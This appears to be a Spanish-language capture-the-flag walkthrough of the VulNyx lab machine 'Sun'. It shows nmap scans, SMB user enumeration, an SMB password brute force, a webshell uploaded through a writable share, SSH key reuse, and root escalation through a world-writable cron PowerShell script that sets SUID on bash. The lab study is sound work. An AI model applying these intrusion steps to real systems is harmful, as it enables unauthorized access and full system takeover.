Sun es una máquina Linux de dificultad fácil de la plataforma VulNyx, creada por d4t4s3c y funciona correctamente en VirtualBox.
Skills:
- SMB Enumeration
- SMB Users Enumeration
- Brute Force (SMB)
- ASP.NET
- Cron Task
- PWSH (PowerShell)
Nmap
❯ nmap -n -Pn -sS -p- --min-rate="5000" 192.168.1.72
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-05 08:26 CEST
Nmap scan report for 192.168.1.72
Host is up (0.000092s latency).
Not shown: 65530 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
8080/tcp open http-proxy
❯ nmap -n -Pn -sVC -p22,80,139,445,8080 192.168.1.72
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-05 08:27 CEST
Nmap scan report for 192.168.1.72
Host is up (0.00051s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
| ssh-hostkey:
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp open http nginx 1.22.1
|_http-server-header: nginx/1.22.1
|_http-title: Sun
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
8080/tcp open http nginx 1.22.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Sun
|_http-server-header: nginx/1.22.1
MAC Address: 08:00:27:C2:6C:00 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: SUN, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2024-04-05T06:27:43
|_ start_date: N/A
|_clock-skew: -2s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
22 ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
80 http nginx 1.22.1
139 netbios-ssn Samba smbd 4.6.2
445 netbios-ssn Samba smbd 4.6.2
8080 http nginx 1.22.1
Port: 80 (HTTP)
realizo fuzzing en busca de posibles rutas/archivos sin éxito
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.72/' -x 'html,php,txt'
/index.html (Status: 200) [Size: 263]
Port: 8080 (HTTP)
realizo fuzzing en busca de posibles rutas/archivos sin éxito
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u 'http://192.168.1.72:8080/' -x 'html,php,txt'
/index.html (Status: 200) [Size: 263]
Information Disclosure
introduzco una ruta no existente para causar un error, se puede ver que el mensaje de error no está controlado y puedo enumerar las tecnologías
ASP.NET
Port: 445 (SMB)
Enum Shares (Guest)
con acceso como usuario invitado no encontré nada interesante
❯ smbclient -NL 192.168.1.72
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
nobody Disk File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.1.72 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbmap -H 192.168.1.72
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.1.72:445 Name: 192.168.1.72 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)
nobody NO ACCESS File Upload Path
Enum Users (RIDs Cycling)
❯ rpcclient -W '' -U ''%'' 192.168.1.72 -c 'lookupnames root'
root S-1-22-1-0 (User: 1)
S-1–22–1–0
❯ for i in $(seq 1000 1005); do bash -c "rpcclient -W '' -U ''%'' 192.168.1.72 -c 'lookupsids S-1-22-1-$i'" ;done
S-1-22-1-1000 Unix User\punt4n0 (1)
S-1-22-1-1001 Unix User\1001 (1)
S-1-22-1-1002 Unix User\1002 (1)
S-1-22-1-1003 Unix User\1003 (1)
S-1-22-1-1004 Unix User\1004 (1)
S-1-22-1-1005 Unix User\1005 (1)
punt4n0
Brute Force (Password)
❯ cme smb 192.168.1.72 -u punt4n0 -p /opt/techyou.txt |grep -v '[-]'
SMB 192.168.1.72 445 SUN [*] Windows 6.1 Build 0 (name:SUN) (domain:SUN) (signing:False) (SMBv1:False)
SMB 192.168.1.72 445 SUN [+] SUN\punt4n0:sunday
sunday
Enum Shares (punt4n0)
al acceder al recurso veo que apunta a la ruta de un servidor HTTP
❯ smbclient -L //192.168.1.72 -U "punt4n0%sunday"
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Samba 4.17.12-Debian)
punt4n0 Disk File Upload Path
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
Protocol negotiation to server 192.168.1.72 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
❯ smbclient //192.168.1.72/punt4n0 -U "punt4n0%sunday"
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Apr 2 10:55:21 2024
.. D 0 Mon Apr 1 18:43:11 2024
index.html N 263 Tue Apr 2 10:54:36 2024
sun.jpg N 98346 Tue Apr 2 10:49:44 2024
19480400 blocks of size 1024. 15670360 blocks available
smb: \>
subo un archivo de prueba para ver donde se almacena
❯ echo 'test' > test.txt
smb: \> put test.txt
putting file test.txt as \test.txt (0.5 kb/s) (average 0.5 kb/s)
el archivo subido vía SMB
apunta al servidor del puerto 8080
❯ curl http://192.168.1.72/test.txt
<html>
<head><title>404 Not Found</title></head>
<body>
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/1.22.1</center>
</body>
</html>
❯ curl http://192.168.1.72:8080/test.txt
test
ahora trato de subir una webshell .aspx
en vista que es un ASP.NET
las webshell .aspx
suelen tener código preparado para Windows
lo adaptamos para que funcione en Linux
subo la webshell .aspx
vía SMB
smb: \> put cmd.aspx
putting file cmd.aspx as \cmd.aspx (137.7 kb/s) (average 65.5 kb/s)
consigo ejecutar comandos como usuario punt4n0
en el home de usuario existe una clave privada id_rsa
también encuentro el archivo .remember_password
con un password
Th3_p0w3r_0f_IIS
Port: 22 (SSH)
accedo al sistema como usuario punt4n0
con la id_rsa
y passphrase
❯ chmod 600 id_rsa
❯ ssh -i id_rsa punt4n0@192.168.1.72
Enter passphrase for key 'id_rsa':
punt4n0@sun:~$ id;hostname
uid=1000(punt4n0) gid=1000(punt4n0) grupos=1000(punt4n0)
sun
Privilege Escalation
no existen permisos sudo/suid
los cuales poder abusar, así que monitorizo tareas cron
que se puedan estar ejecutando en el sistema
punt4n0@sun:~$ cd /dev/shm
punt4n0@sun:/dev/shm$ cat << 'EOF' > PSmon
> #!/bin/bash
old=$(ps -eo command)
filter="kworker|command|defunct"
function ctrl_c(){
exit 1
}
trap ctrl_c int
while true; do
new=$(ps -eo command)
diff <(echo "$old") <(echo "$new") | grep "[\>\<]" | grep -vE "$filter"
old=$new
done
> EOF
punt4n0@sun:/dev/shm$ chmod +x PSMon
encuentro una tarea cron
que ejecuta un script .ps1 (PowerShell)
, el script ejecuta el comando id
y la salida del comando se guarda en /dev/shm
en un archivo saliente llamado out
punt4n0@sun:/dev/shm$ ls -la /opt/service.ps1
-rwx---rw- 1 root root 97 abr 2 10:58 /opt/service.ps1
punt4n0@sun:/dev/shm$ cat /opt/service.ps1
$idOutput = id
$outputFilePath = "/dev/shm/out"
$idOutput | Out-File -FilePath $outputFilePath
el propietario de service.ps1
es root
y “otros” pueden escribir
-rwx — -rw-
le doy permisos suid/4755
a /bin/bash
me convierto en usuario root
punt4n0@sun:~$ ls -l $(which bash)
-rwxr-xr-x 1 root root 1265648 abr 23 2023 /usr/bin/bash
punt4n0@sun:~$ ls -l $(which bash)
-rwsr-xr-x 1 root root 1265648 abr 23 2023 /usr/bin/bash
punt4n0@sun:~$ /usr/bin/bash -p
bash-5.2# id
uid=1000(punt4n0) gid=1000(punt4n0) euid=0(root) grupos=1000(punt4n0)
ya como usuario root
puedo leer las flags user.txt
y root.txt
bash-5.2# find / -name user.txt -o -name root.txt |xargs cat
e1e7f5e0************************
3b16b996************************
hasta aquí la máquina Sun.
Happy Hacking!